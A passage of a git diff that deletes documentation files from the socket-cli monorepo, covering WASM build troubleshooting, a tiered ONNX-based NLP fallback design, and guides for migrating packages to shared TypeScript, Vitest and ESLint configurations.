usage**: - ```bash - export CARGO_BUILD_JOBS=$(nproc) - ``` - -### Build fails with wasm-opt - -The build will continue without optimization: - -```bash -# Install binaryen for wasm-opt -brew install binaryen # macOS -sudo apt-get install binaryen # Linux -choco install binaryen # Windows -``` - -### Out of memory - -Large WASM builds may require more memory: - -```bash -# Increase Node.js memory limit -export NODE_OPTIONS="--max-old-space-size=8192" -``` - -### Incremental builds not working - -WASM builds disable incremental compilation: - -```toml -[profile.dev-wasm] -incremental = false # Required for WASM -``` - -Use sccache instead for faster rebuilds. - ---- - -## CI/CD Recommendations - -### GitHub Actions - -```yaml -- name: Setup Rust - uses: actions-rs/toolchain@v1 - with: - toolchain: stable - target: wasm32-unknown-unknown - -- name: Install wasm-pack - run: cargo install wasm-pack - -- name: Install binaryen - run: | - brew install binaryen # macOS - # or apt-get install binaryen for Linux - -- name: Setup build cache - uses: actions/cache@v3 - with: - path: | - ~/.cargo/registry - ~/.cargo/git - target - ~/.cache/sccache - key: ${{ runner.os }}-wasm-${{ hashFiles('**/Cargo.lock') }} - -- name: Build WASM - run: node scripts/wasm/build-unified-wasm.mjs -``` - -### Cache Strategy - -1. **Cargo registry/git** - Dependencies (~500 MB) -2. **Target directory** - Compiled artifacts (~2-3 GB) -3. **sccache directory** - Compilation cache (~1-2 GB) - ---- - -## Advanced: Manual Build Steps - -If you need fine-grained control: - -### 1. Direct Cargo Build - -```bash -cd packages/node-smol-builder/wasm-bundle - -# Dev build -cargo build --target wasm32-unknown-unknown --profile dev-wasm - -# Production build -cargo build --target wasm32-unknown-unknown --release -``` - -### 2. Manual wasm-opt - -```bash -# Optimize for size -wasm-opt -Oz input.wasm -o output.wasm - -# Optimize for speed -wasm-opt -O3 input.wasm -o output.wasm - -# With SIMD -wasm-opt -Oz --enable-simd input.wasm -o output.wasm -``` - -### 3. Manual Compression - -```bash -# Brotli compression -brotli -q 11 -w 24 socket_ai_bg.wasm -o socket_ai_bg.wasm.br - -# Check compression ratio -ls -lh socket_ai_bg.wasm* -``` - ---- - -## References - -- **Cargo Profiles**: https://doc.rust-lang.org/cargo/reference/profiles.html -- **wasm-pack**: https://rustwasm.github.io/wasm-pack/ -- **wasm-opt (Binaryen)**: https://github.com/WebAssembly/binaryen -- **sccache**: https://github.com/mozilla/sccache -- **Implementation details**: `.claude/wasm-optimization-summary.md` - ---- - -## Summary - -**For development**: -```bash -node scripts/wasm/build-unified-wasm.mjs --dev # Fast iteration -``` - -**For production**: -```bash -node scripts/wasm/build-unified-wasm.mjs # Fully optimized -``` - -**For benchmarking**: -```bash -node scripts/wasm/benchmark-build.mjs # Compare performance -``` - -**For optimization**: -```bash -node scripts/wasm/setup-build-env.mjs # Setup caching -``` diff --git a/docs/cli/nlp-progressive-enhancement.md b/docs/cli/nlp-progressive-enhancement.md deleted file mode 100644 index 78bb779a5..000000000 --- a/docs/cli/nlp-progressive-enhancement.md +++ /dev/null @@ -1,271 +0,0 @@ -# NLP Progressive Enhancement - -Socket CLI's NLP system uses progressive enhancement to work with or without ONNX Runtime and ML models. - -## Overview - -The NLP system provides three tiers of functionality: - -``` -┌─────────────────────────────────────────┐ -│ Tier 3: Full (CodeT5) │ -│ Code analysis & synthesis │ -│ Requires: ONNX Runtime + CodeT5 models│ -└─────────────────────────────────────────┘ -┌─────────────────────────────────────────┐ -│ Tier 2: Enhanced (MiniLM) │ -│ Semantic embeddings │ -│ Requires: ONNX Runtime + MiniLM model │ -└─────────────────────────────────────────┘ -┌─────────────────────────────────────────┐ -│ Tier 1: Baseline (compromise) │ -│ Basic NLP features │ -│ Always available (pure JS) │ -└─────────────────────────────────────────┘ -``` - -## Architecture - -### Stub Pattern - -The `onnx-runtime-stub.mts` module provides a graceful fallback API: - -```typescript -// Try to load real ONNX Runtime, fall back to stub if unavailable. -export async function loadOnnxRuntime() { - try { - const onnx = await import('onnxruntime-node') - return onnx - } catch { - // Return stub for graceful degradation. - return stubOnnxRuntime - } -} -``` - -### Progressive Loading - -The `nlp.mts` module uses capability checks: - -```typescript -// Check if enhanced NLP is available. -async function checkEnhancedNLP(): Promise { - // Load ONNX Runtime (real or stub). - onnxRuntime = await loadOnnxRuntime() - - if (!onnxRuntime) return false - - // Check if models are available. - if (!existsSync(minilmModel)) return false - - // Try to load the model. - minilmSession = await onnxRuntime.InferenceSession.create(minilmModel) - - return minilmSession !== null -} -``` - -## Features by Tier - -### Tier 1: Baseline (Always Available) - -Uses `compromise` library for pure JavaScript NLP: - -- `tokenize()` - Basic word tokenization -- `extractEntities()` - Named entity recognition (people, places, organizations) -- `getSentiment()` - Sentiment analysis (positive/negative/neutral) -- `semanticSimilarity()` - Word overlap-based similarity (compromise fallback) -- `analyzeCode()` - Line count and basic complexity estimation - -### Tier 2: Enhanced (When MiniLM + ONNX Available) - -Adds semantic understanding via MiniLM embeddings: - -- `tokenize()` - WordPiece tokenization (more accurate) -- `getEmbedding()` - 384-dimensional semantic embeddings -- `semanticSimilarity()` - Cosine similarity between embeddings - -### Tier 3: Full (When CodeT5 + ONNX Available) - -Adds code-specific ML capabilities: - -- `analyzeCode()` - Deep code analysis via CodeT5 encoder -- `synthesizeCode()` - Code generation via CodeT5 decoder -- `explainVulnerability()` - Security issue explanations -- `suggestFix()` - Automated fix suggestions -- `calculateCodeSimilarity()` - Semantic code similarity - -## Configuration - -### Model Paths - -Configure model locations via environment variable: - -```bash -export SOCKET_CLI_MODELS_PATH=/path/to/models -``` - -Default: `.cache/models/` - -Expected model files: -- `minilm-l6-int4.onnx` - MiniLM embeddings model (INT4 quantized) -- `minilm-l6-tokenizer.json` - MiniLM tokenizer vocabulary -- `codet5-encoder-int4.onnx` - CodeT5 encoder (INT4 quantized) -- `codet5-decoder-int4.onnx` - CodeT5 decoder (INT4 quantized) -- `codet5-tokenizer.json` - CodeT5 tokenizer vocabulary - -### Capability Detection - -Check available features at runtime: - -```typescript -import { getNLPCapabilities } from './utils/nlp.mts' - -const capabilities = await getNLPCapabilities() - -if (capabilities.baseline) { - // Basic NLP always available -} - -if (capabilities.enhanced) { - // Semantic embeddings available -} - -if (capabilities.codet5) { - // Code analysis/synthesis available -} -``` - -## Build Requirements - -### Minimal Build (Baseline Only) - -No external dependencies required: -- Pure JavaScript via `compromise` -- Works on any platform -- No WASM compilation needed - -### Enhanced Build (MiniLM) - -Requires: -- ONNX Runtime (`onnxruntime-node` package) -- MiniLM model files (INT4 quantized, ~4MB) - -### Full Build (CodeT5) - -Requires: -- ONNX Runtime (`onnxruntime-node` package) -- CodeT5 model files (INT4 quantized, ~50MB encoder + ~50MB decoder) - -## Testing - -Test without ONNX Runtime: - -```bash -# Temporarily hide onnxruntime-node. -NODE_PATH=/tmp/nonexistent node test-nlp-fallback.mjs -``` - -Verify: -- ✓ Capabilities report baseline-only -- ✓ All functions return results -- ✓ No exceptions thrown -- ✓ Graceful degradation to compromise - -## Benefits - -### For Development - -- Fast builds without waiting for WASM compilation -- Works in environments without ONNX Runtime support -- Easy to test baseline vs enhanced features - -### For Production - -- Smaller binary size without ML models -- Faster startup time without model loading -- Flexible deployment (ship with or without models) - -### For Users - -- CLI works immediately without model downloads -- Optional enhanced features for power users -- No breaking changes when models unavailable - -## Implementation Details - -### Why Stub Instead of Optional Imports? - -We use a stub pattern instead of conditional imports because: - -1. **Type Safety**: Stub provides correct types for IDE autocomplete -2. **Error Handling**: Graceful fallback instead of import errors -3. **Testing**: Easy to test both paths (real vs stub) -4. **Compatibility**: Works with any module system (ESM, CJS) - -### Why INT4 Quantization? - -Models are quantized to INT4 (4-bit integers) for: - -1. **Size**: 8x smaller than FP32 models -2. **Speed**: Faster inference on CPU -3. **Memory**: Lower RAM usage -4. **Quality**: Minimal accuracy loss for NLP tasks - -MiniLM: 25MB (FP32) → 4MB (INT4) -CodeT5: 800MB (FP32) → 100MB (INT4) - -### Why Three Tiers? - -- **Baseline**: Ensures CLI always works -- **Enhanced**: Adds semantic understanding without huge models -- **Full**: Maximum capability for security analysis - -## Troubleshooting - -### ONNX Runtime Not Loading - -Symptoms: `enhanced: false` in capabilities - -Solutions: -- Install onnxruntime-node: `npm install onnxruntime-node` -- Check platform support (Node.js 18+, x64/arm64) -- Verify WASM support: `node --experimental-wasm-modules` - -### Models Not Found - -Symptoms: `enhanced: false` even with ONNX Runtime - -Solutions: -- Download models to `.cache/models/` -- Set `SOCKET_CLI_MODELS_PATH` environment variable -- Check file permissions -- Verify model file integrity (INT4 ONNX format) - -### Performance Issues - -Symptoms: Slow NLP operations - -Solutions: -- Use INT4 quantized models (not FP32) -- Enable WASM SIMD: `node --experimental-wasm-simd` -- Enable WASM threads: `node --experimental-wasm-threads` -- Increase Node.js memory: `NODE_OPTIONS="--max-old-space-size=4096"` - -## Future Enhancements - -Potential improvements: - -1. **Model Streaming**: Download models on-demand -2. **WebGPU**: GPU acceleration for faster inference -3. **Model Caching**: Cache embeddings to disk -4. **Quantization**: INT2 models for even smaller size -5. **Fine-tuning**: Custom models for Socket-specific tasks - -## References - -- [ONNX Runtime](https://onnxruntime.ai/) -- [MiniLM Paper](https://arxiv.org/abs/2002.10957) -- [CodeT5 Paper](https://arxiv.org/abs/2109.00859) -- [Quantization Guide](https://onnxruntime.ai/docs/performance/model-optimizations/quantization.html) -- [Progressive Enhancement](https://developer.mozilla.org/en-US/docs/Glossary/Progressive_Enhancement) diff --git a/docs/configuration/configuration-migration.md b/docs/configuration/configuration-migration.md deleted file mode 100644 index 46371f4fd..000000000 --- a/docs/configuration/configuration-migration.md +++ /dev/null @@ -1,308 +0,0 @@ -# Configuration Migration Guide - -This guide explains how to migrate packages in the socket-cli monorepo to use the shared configuration architecture. - -## Overview - -The monorepo now has shared configuration files in `.config/` at the root level. Packages should extend these base configurations instead of duplicating settings. - -## Shared Configuration Files - -### Location: `.config/` - -- `tsconfig.base.json` - Base TypeScript settings -- `tsconfig.build.json` - For build outputs with declarations -- `tsconfig.test.json` - For test files -- `vitest.config.base.mts` - Base Vitest test configuration -- `eslint.config.mjs` - ESLint flat config (monorepo-wide) -- `esbuild-inject-import-meta.mjs` - Import.meta polyfill for esbuild - -## Migration Steps by Configuration Type - -### TypeScript Configuration - -#### Before (Duplicated Config) - -```json -{ - "compilerOptions": { - "target": "ES2024", - "module": "nodenext", - "strict": true, - "exactOptionalPropertyTypes": true, - "noUncheckedIndexedAccess": true, - // ... 30+ more options - }, - "include": ["src/**/*.mts"], - "exclude": ["src/**/*.test.mts", "dist/**"] -} -``` - -#### After (Extended Config) - -```json -{ - "extends": "../../.config/tsconfig.base.json", - "include": ["src/**/*.mts"], - "exclude": ["src/**/*.test.mts", "dist/**"] -} -``` - -#### With Custom Paths - -For packages that need path mappings (like CLI with local dependencies): - -```json -{ - "extends": "../../.config/tsconfig.base.json", - "compilerOptions": { - "paths": { - "@socketsecurity/lib": ["../../socket-lib/dist/index.d.ts"], - "@socketsecurity/registry": ["../../socket-registry/registry/dist/index.d.ts"] - } - }, - "include": ["src/**/*.mts"], - "exclude": ["src/**/*.test.mts", "dist/**"] -} -``` - -### Vitest Configuration - -#### Before (Duplicated Config) - -```typescript -import { defineConfig } from 'vitest/config' - -export default defineConfig({ - test: { - globals: false, - environment: 'node', - include: ['test/**/*.test.{mts,ts}'], - exclude: [ - '**/node_modules/**', - '**/dist/**', - // ... many more patterns - ], - pool: 'threads', - poolOptions: { - threads: { - singleThread: false, - maxThreads: 16, - minThreads: 4, - isolate: false, - useAtomics: true, - }, - }, - testTimeout: 30_000, - hookTimeout: 30_000, - coverage: { - provider: 'v8', - reporter: ['text', 'json', 'html', 'lcov', 'clover'], - // ... many more options - }, - }, -}) -``` - -#### After (Merged Config) - -```typescript -import { defineConfig, mergeConfig } from 'vitest/config' -import baseConfig from '../../.config/vitest.config.base.mts' - -export default mergeConfig( - baseConfig, - defineConfig({ - test: { - include: [ - 'test/**/*.test.{mts,ts}', - 'src/**/*.test.{mts,ts}', - ], - setupFiles: ['./test/setup.mts'], - }, - }) -) -``` - -#### With Custom Settings - -For packages with special needs (e.g., longer timeouts, custom coverage): - -```typescript -import { defineConfig, mergeConfig } from 'vitest/config' -import baseConfig from '../../.config/vitest.config.base.mts' - -export default mergeConfig( - baseConfig, - defineConfig({ - test: { - testTimeout: 120_000, // 2 minutes for slow tests - hookTimeout: 30_000, - coverage: { - thresholds: { - lines: 0, - functions: 0, - branches: 0, - statements: 0, - }, - }, - }, - }) -) -``` - -### ESLint Configuration - -#### Root Level Only - -The ESLint configuration lives at the root and applies to the entire monorepo. Individual packages **do not** need their own ESLint configs. - -#### Package-Specific Rules (Rare) - -If a package truly needs custom ESLint rules, extend the root config: - -```javascript -import rootConfig from '../../.config/eslint.config.mjs' - -export default [ - ...rootConfig, - { - files: ['src/**/*.mts'], - rules: { - // Package-specific overrides - 'no-console': 'warn', - }, - }, -] -``` - -### esbuild Configuration - -#### Before (Relative Paths) - -```javascript -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) - -export default { - // ... config - inject: [path.join(__dirname, 'esbuild-inject-import-meta.mjs')], -} -``` - -#### After (Shared Utility) - -```javascript -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '..') - -export default { - // ... config - inject: [path.join(rootPath, '..', '..', '.config', 'esbuild-inject-import-meta.mjs')], -} -``` - -## Package-by-Package Migration Plan - -### Phase 1: Simple Packages (Low Risk) - -Start with packages that have minimal custom configuration: - -1. **packages/cli-with-sentry** - - Simple vitest config (just timeout overrides) - - Should extend base config easily - -2. **packages/node-smol-builder** - - Simple vitest config (just timeout overrides) - - Should extend base config easily - -3. **packages/node-sea-builder** - - Simple vitest config (just timeout overrides) - - Should extend base config easily - -4. **packages/socket** - - Simple vitest config with coverage overrides - - Should extend base config easily - -### Phase 2: Complex Package (Higher Risk) - -5. **packages/cli** - - Has complex .config/ subdirectory - - Multiple TypeScript configs (base, check) - - Custom esbuild configs - - Should migrate carefully, keeping package-specific build configs - -### Phase 3: Root Configs - -6. **Root vitest configs** - - `vitest.config.mts` - Already serves as template for base config - - `vitest.config.isolated.mts` - Keep for isolated test runs - - `vitest.e2e.config.mts` - Keep for E2E tests - -## Migration Checklist - -For each package: - -- [ ] Read current tsconfig.json and identify custom settings -- [ ] Create new tsconfig.json that extends `../../.config/tsconfig.base.json` -- [ ] Move custom compilerOptions (paths, typeRoots, etc.) to new config -- [ ] Keep include/exclude patterns specific to the package -- [ ] Test: Run `pnpm tsc` to verify type checking still works - -- [ ] Read current vitest.config.mts and identify custom settings -- [ ] Create new vitest.config.mts that merges with base config -- [ ] Move custom test settings (timeouts, includes, setupFiles) to new config -- [ ] Test: Run `pnpm test` to verify tests still pass - -- [ ] Identify any package-specific eslint configs -- [ ] If none exist, no action needed (root config applies) -- [ ] If custom rules exist, evaluate if they should move to root or stay local - -- [ ] Update esbuild configs to use shared import.meta inject helper -- [ ] Test: Run builds to verify output is correct - -- [ ] Remove duplicate configuration files -- [ ] Update documentation if package has special config needs -- [ ] Commit changes with descriptive message - -## Validation - -After migration, verify: - -1. **Type checking**: `pnpm tsc` passes -2. **Linting**: `pnpm check:lint` passes -3. **Tests**: `pnpm test` passes -4. **Build**: `pnpm build` produces expected output -5. **Coverage**: `pnpm run test:unit:coverage` works - -## Rollback Plan - -If migration causes issues: - -1. Keep git history clean with one package per commit -2. Revert individual package commits if needed -3. Document any incompatibilities discovered -4. Update base configs to accommodate edge cases - -## Benefits After Migration - -1. **Reduced Lines of Code**: 50-100+ lines removed per package -2. **Single Source of Truth**: Update once, applies everywhere -3. **Consistency**: All packages use same base settings -4. **Easier Maintenance**: Less configuration to track -5. **Better Defaults**: Proven settings with documented rationale - -## Questions or Issues? - -If you encounter problems during migration: - -1. Check `.config/README.md` for usage examples -2. Compare with already-migrated packages -3. Verify you're using mergeConfig for Vitest (not defineConfig alone) -4. Ensure extends paths are correct (../../.config/...) -5. Document any edge cases for future reference diff --git a/docs/configuration/configuration-summary.md b/docs/configuration/configuration-summary.md deleted file mode 100644 index cccf1c9f7..000000000 --- a/docs/configuration/configuration-summary.md +++ /dev/null @@ -1,272 +0,0 @@ -# Shared Configuration Architecture - Summary - -## Overview - -A comprehensive shared configuration architecture has been implemented for the socket-cli monorepo. All shared configuration now lives in `.config/` at the root level, providing a single source of truth for TypeScript, Vitest, ESLint, and build utilities. - -## What Was Created - -### Directory Structure - -``` -.config/ -├── README.md # Usage documentation and examples -├── tsconfig.base.json # Base TypeScript configuration -├── tsconfig.build.json # Build-specific TS config -├── tsconfig.test.json # Test-specific TS config -├── vitest.config.base.mts # Base Vitest test configuration -├── eslint.config.mjs # ESLint flat config (monorepo-wide) -└── esbuild-inject-import-meta.mjs # Import.meta polyfill for esbuild -``` - -### Configuration Files (7 files, ~739 lines) - -1. **TypeScript Configurations** (3 files) - - `tsconfig.base.json` - Strict TypeScript settings for all packages - - `tsconfig.build.json` - Extends base for declaration generation - - `tsconfig.test.json` - Extends base with relaxed rules for tests - -2. **Vitest Configuration** (1 file) - - `vitest.config.base.mts` - Base test runner configuration with optimal thread pool settings - -3. **ESLint Configuration** (1 file) - - `eslint.config.mjs` - Comprehensive flat config with TypeScript, import ordering, and Node.js rules - -4. **Build Utilities** (1 file) - - `esbuild-inject-import-meta.mjs` - Polyfill for import.meta.url in CommonJS bundles - -5. **Documentation** (1 file) - - `README.md` - Usage examples and reference for all configurations - -### Documentation (3 files) - -1. **docs/shared-configuration-architecture.md** - - Design principles and rationale - - Directory structure and file descriptions - - Configuration patterns and examples - - Key decisions with trade-offs - - Future enhancements - -2. **docs/configuration-migration.md** - - Step-by-step migration guide - - Before/after examples - - Package-by-package migration plan - - Validation checklist - - Rollback procedures - -3. **docs/configuration-summary.md** (this file) - - Quick reference overview - - Migration roadmap - - Expected benefits - -## Current State Analysis - -### Root Level - -**Existing configs**: -- ✓ `.config/tsconfig.base.json` - Already existed, now documented -- ✓ `tsconfig.json` - Extends `.config/tsconfig.base.json` -- ✓ `vitest.config.mts` - Root test config (can be aligned with base) -- ✓ `vitest.config.isolated.mts` - Special purpose (keep as-is) -- ✓ `vitest.e2e.config.mts` - E2E tests (keep as-is) -- ✓ `biome.json` - Formatter config (keep as-is) - -**New configs**: -- ✓ `.config/tsconfig.build.json` -- ✓ `.config/tsconfig.test.json` -- ✓ `.config/vitest.config.base.mts` -- ✓ `.config/eslint.config.mjs` (copied from packages/cli) -- ✓ `.config/esbuild-inject-import-meta.mjs` (copied from packages/cli) - -### Package Level - -**packages/cli/**: -- Current: Has own `.config/` with tsconfig.base.json, tsconfig.check.json, eslint.config.mjs, esbuild configs -- Migration: Update tsconfig.json to extend root base, migrate vitest config -- Keep: Package-specific build configs (esbuild, babel) - -**packages/cli-with-sentry/**: -- Current: Simple vitest.config.mts -- Migration: Easy - extend base vitest config - -**packages/socket/**: -- Current: Simple vitest.config.mts with coverage overrides -- Migration: Easy - extend base vitest config with coverage overrides - -**packages/socketbin-\*/**: -- Current: Simple vitest.config.mts files -- Migration: Easy - extend base vitest config - -## Migration Roadmap - -### Phase 1: Documentation ✓ COMPLETE - -- [x] Create shared configuration files -- [x] Write comprehensive documentation -- [x] Document migration process -- [x] Create usage examples - -### Phase 2: Simple Packages (Recommended Next) - -Migrate packages with minimal custom configuration: - -1. **packages/node-smol-builder** - - Impact: Low risk - - Effort: 15-30 minutes - - Files: tsconfig.json, vitest.config.mts - -2. **packages/node-sea-builder** - - Impact: Low risk - - Effort: 15-30 minutes - - Files: tsconfig.json, vitest.config.mts - -3. **packages/cli-with-sentry** - - Impact: Low risk - - Effort: 15-30 minutes - - Files: tsconfig.json, vitest.config.mts - -4. **packages/socket** - - Impact: Medium risk (coverage overrides) - - Effort: 30-45 minutes - - Files: tsconfig.json, vitest.config.mts - -### Phase 3: Complex Package - -5. **packages/cli** - - Impact: Medium-high risk (many custom configs) - - Effort: 1-2 hours - - Files: tsconfig.json, vitest.config.mts, .config/tsconfig.check.json - - Note: Keep package-specific build configs (esbuild, babel) - -### Phase 4: Root Alignment - -6. **Root vitest.config.mts** - - Impact: Low risk - - Effort: 30 minutes - - Consider: Align with base config or keep as template - -## Expected Benefits - -### Quantitative - -- **Lines of Code**: Reduce 50-100 lines per package -- **Maintenance**: 1 file to update instead of 5-10 -- **Consistency**: 100% config alignment across packages -- **Duplication**: ~75-90% reduction in config duplication - -### Qualitative - -1. **Single Source of Truth** - All shared settings in `.config/` -2. **Easier Onboarding** - New packages start with proven configs -3. **Better Defaults** - Settings based on Socket team experience -4. **Faster Updates** - Change once, applies everywhere -5. **Clear Overrides** - Easy to see what's custom vs. standard - -## Configuration Patterns - -### Simple Package Example - -**Before** (95 lines): -- tsconfig.json: 40 lines of duplicated compiler options -- vitest.config.mts: 55 lines of duplicated test settings - -**After** (10 lines): -- tsconfig.json: 5 lines (extends + include/exclude) -- vitest.config.mts: 5 lines (merge base + custom include) - -**Savings**: 85 lines (89% reduction) - -### Package with Custom Paths Example - -**Before** (100 lines): -- tsconfig.json: 45 lines (40 base + 5 paths) -- vitest.config.mts: 55 lines - -**After** (15 lines): -- tsconfig.json: 10 lines (extends + paths + include/exclude) -- vitest.config.mts: 5 lines - -**Savings**: 85 lines (85% reduction) - -## Key Design Decisions - -### 1. TypeScript: noUncheckedIndexedAccess - -**Enabled by default** - Prevents runtime errors from undefined access - -### 2. Vitest: isolate: false - -**Disabled by default** - 2-3x performance improvement, required for mocking - -### 3. ESLint: Single Root Config - -**One config for all** - Flat config naturally works across monorepo - -### 4. ESLint: Type-Aware Linting Disabled - -**Disabled by default** - Prevents performance issues on large codebases - -### 5. Build Configs: Package-Specific - -**Keep in packages** - esbuild, babel configs stay with packages - -## Quick Start for Packages - -### TypeScript - -```json -{ - "extends": "../../.config/tsconfig.base.json", - "include": ["src/**/*.mts"], - "exclude": ["src/**/*.test.mts", "dist/**"] -} -``` - -### Vitest - -```typescript -import { defineConfig, mergeConfig } from 'vitest/config' -import baseConfig from '../../.config/vitest.config.base.mts' - -export default mergeConfig( - baseConfig, - defineConfig({ - test: { - include: ['test/**/*.test.{mts,ts}'], - }, - }) -) -``` - -## Validation Checklist - -After migration: - -- [ ] Type checking: `pnpm tsc` passes -- [ ] Linting: `pnpm check:lint` passes -- [ ] Tests: `pnpm test` passes -- [ ] Build: `pnpm build` produces expected output -- [ ] Coverage: `pnpm run test:unit:coverage` works - -## Next Steps - -1. **Review** - Review shared configs and documentation -2. **Approve** - Get team approval for architecture -3. **Migrate** - Start with Phase 2 simple packages -4. **Validate** - Run full test suite after each migration -5. **Iterate** - Adjust base configs based on feedback - -## Resources - -- [Shared Configuration Architecture](./shared-configuration-architecture.md) - Full design document -- [Configuration Migration Guide](./configuration-migration.md) - Detailed migration steps -- [.config/README.md](../.config/README.md) - Usage reference and examples - -## Support - -For questions or issues: - -1. Check `.config/README.md` for usage examples -2. Review docs/configuration-migration.md for migration steps -3. Compare with migrated packages -4. Document edge cases for future reference diff --git a/docs/configuration/shared-configuration-architecture.md b/docs/configuration/shared-configuration-architecture.md deleted file mode 100644 index 4c3b6ed9c..000000000 --- a/docs/configuration/shared-configuration-architecture.md +++ /dev/null @@ -1,299 +0,0 @@ -# Shared Configuration Architecture - -This document describes the shared configuration architecture for the socket-cli monorepo. - -## Design Principles - -1. **Single Source of Truth** - All shared configuration lives in `.config/` at the root -2. **Minimal Duplication** - Packages extend base configs, not copy them -3. **Easy Maintenance** - Update configuration in one place -4. **Progressive Enhancement** - Packages can override when needed -5. **Explicit Overrides** - Clear separation between base and custom settings - -## Directory Structure - -``` -socket-cli/ -├── .config/ # Shared configuration (NEW) -│ ├── README.md # Usage documentation -│ ├── tsconfig.base.json # Base TypeScript config -│ ├── tsconfig.build.json # Build-specific TS config -│ ├── tsconfig.test.json # Test-specific TS config -│ ├── vitest.config.base.mts # Base Vitest config -│ ├── eslint.config.mjs # ESLint flat config -│ └── esbuild-inject-import-meta.mjs # esbuild helper -├── biome.json # Biome formatter (root-only) -├── tsconfig.json # Root TS config (extends .config) -├── vitest.config.mts # Root Vitest config (already uses patterns from base) -├── vitest.config.isolated.mts # Isolated test config (special purpose) -├── vitest.e2e.config.mts # E2E test config (special purpose) -└── packages/ - ├── cli/ - │ ├── tsconfig.json # Extends ../../.config/tsconfig.base.json - │ ├── vitest.config.mts # Merges ../../.config/vitest.config.base.mts - │ └── .config/ # Package-specific build configs - │ ├── tsconfig.check.json # Type checking with custom paths - │ ├── esbuild.cli.build.mjs # CLI build config - │ └── babel.config.js # Babel for React components - ├── cli-with-sentry/ - │ ├── tsconfig.json # Extends ../../.config/tsconfig.base.json - │ └── vitest.config.mts # Merges ../../.config/vitest.config.base.mts - ├── socket/ - │ ├── tsconfig.json # Extends ../../.config/tsconfig.base.json - │ └── vitest.config.mts # Merges ../../.config/vitest.config.base.mts - └── socketbin-*/ - ├── tsconfig.json # Extends ../../.config/tsconfig.base.json - └── vitest.config.mts # Merges ../../.config/vitest.config.base.mts -``` - -## Configuration Files - -### TypeScript Configurations - -#### `.config/tsconfig.base.json` - -Base TypeScript configuration with strict settings: - -- **Target**: ES2024 -- **Module**: nodenext (Node.js ESM + CJS) -- **Strict Mode**: Full TypeScript strict mode -- **Extra Safety**: - - `exactOptionalPropertyTypes: true` - - `noUncheckedIndexedAccess: true` - - `noPropertyAccessFromIndexSignature: true` -- **Compatibility**: Designed for @typescript/native-preview - -**When to use**: All TypeScript projects should extend this. - -#### `.config/tsconfig.build.json` - -Extends base config for build outputs: - -- Enables `declaration: true` (generate .d.ts files) -- Enables `declarationMap: true` (source maps for declarations) -- Enables `composite: true` (project references) -- Enables `incremental: true` (faster rebuilds) - -**When to use**: Packages that need to emit type declarations. - -#### `.config/tsconfig.test.json` - -Extends base config for test files: - -- Relaxes `noUnusedLocals: false` -- Relaxes `noUnusedParameters: false` - -**When to use**: Test-specific type checking configs. - -### Vitest Configuration - -#### `.config/vitest.config.base.mts` - -Base Vitest test runner configuration: - -- **Environment**: Node.js -- **Pool**: Threads with optimal settings - - `isolate: false` for performance and mocking compatibility - - `maxThreads: 16` (or 1 for coverage) - - `minThreads: 4` (or 1 for coverage) -- **Timeouts**: 30 seconds for tests and hooks -- **Coverage**: v8 provider with comprehensive settings -- **Exclusions**: Standard patterns (node_modules, dist, etc.) - -**When to use**: All packages should merge this config. - -### ESLint Configuration - -#### `.config/eslint.config.mjs` - -Flat config ESLint setup for the entire monorepo: - -- **TypeScript Support**: @typescript-eslint with type checking disabled (performance) -- **Import Rules**: eslint-plugin-import-x with auto-fix ordering -- **Node.js Rules**: eslint-plugin-n for Node.js compatibility -- **Custom Rules**: - - Sort destructured keys - - Prefer const - - No await in loop (warning) - - Unicorn rules for best practices -- **Integration**: Imports patterns from biome.json and .gitignore - -**When to use**: Applies automatically to entire monorepo. Packages rarely need custom configs. - -### Build Utilities - -#### `.config/esbuild-inject-import-meta.mjs` - -Polyfill for import.meta.url in CommonJS bundles: - -```javascript -export const __importMetaUrl = - typeof __filename !== 'undefined' - ? `file://${__filename.replace(/\\/g, '/')}` - : 'file:///unknown' -``` - -**When to use**: esbuild configs that bundle to CommonJS but need import.meta.url support. - -## Configuration Patterns - -### Pattern 1: Simple Package - -Minimal custom configuration: - -**tsconfig.json**: -```json -{ - "extends": "../../.config/tsconfig.base.json", - "include": ["src/**/*.mts"], - "exclude": ["src/**/*.test.mts", "dist/**"] -} -``` - -**vitest.config.mts**: -```typescript -import { defineConfig, mergeConfig } from 'vitest/config' -import baseConfig from '../../.config/vitest.config.base.mts' - -export default mergeConfig( - baseConfig, - defineConfig({ - test: { - include: ['test/**/*.test.{mts,ts}'], - }, - }) -) -``` - -### Pattern 2: Package with Custom Paths - -TypeScript path mappings for local dependencies: - -**tsconfig.json**: -```json -{ - "extends": "../../.config/tsconfig.base.json", - "compilerOptions": { - "paths": { - "@socketsecurity/lib": ["../../socket-lib/dist/index.d.ts"] - } - }, - "include": ["src/**/*.mts"], - "exclude": ["src/**/*.test.mts", "dist/**"] -} -``` - -### Pattern 3: Package with Custom Coverage - -Override coverage thresholds: - -**vitest.config.mts**: -```typescript -import { defineConfig, mergeConfig } from 'vitest/config' -import baseConfig from '../../.config/vitest.config.base.mts' - -export default mergeConfig( - baseConfig, - defineConfig({ - test: { - include: ['test/**/*.test.{mts,ts}'], - coverage: { - thresholds: { - lines: 0, - functions: 0, - branches: 0, - statements: 0, - }, - }, - }, - }) -) -``` - -### Pattern 4: Package with Build-Specific Configs - -Separate configs for different purposes: - -``` -packages/cli/.config/ -├── tsconfig.base.json # Base settings (can extend root) -├── tsconfig.check.json # Type checking with custom paths -├── esbuild.cli.build.mjs # CLI build config -└── babel.config.js # React component transpilation -``` - -## Rationale for Key Decisions - -### TypeScript: noUncheckedIndexedAccess - -**Decision**: Enabled by default - -**Rationale**: -- Prevents common runtime errors from undefined array/object access -- Enforces defensive programming -- TypeScript best practice for modern codebases - -**Trade-off**: More verbose code with optional chaining and checks - -### Vitest: isolate: false - -**Decision**: Disabled by default - -**Rationale**: -- Significant performance improvement (2-3x faster) -- Required for nock HTTP mocking to work -- Required for vi.mock() module mocking -- Test pollution prevented by proper beforeEach/afterEach -- Socket projects have well-designed tests with cleanup - -**Trade-off**: Shared worker context across tests (acceptable with good practices) - -### ESLint: Type-Aware Linting Disabled - -**Decision**: project: null in parserOptions - -**Rationale**: -- Type-aware linting causes performance issues on large codebases -- Can hang for minutes on full monorepo checks -- Most type errors caught by TypeScript compiler anyway -- Linting should be fast, type checking should be separate - -**Trade-off**: Some rules like @typescript-eslint/return-await won't work - -### Single ESLint Config - -**Decision**: One root config, not per-package - -**Rationale**: -- ESLint flat config works across entire 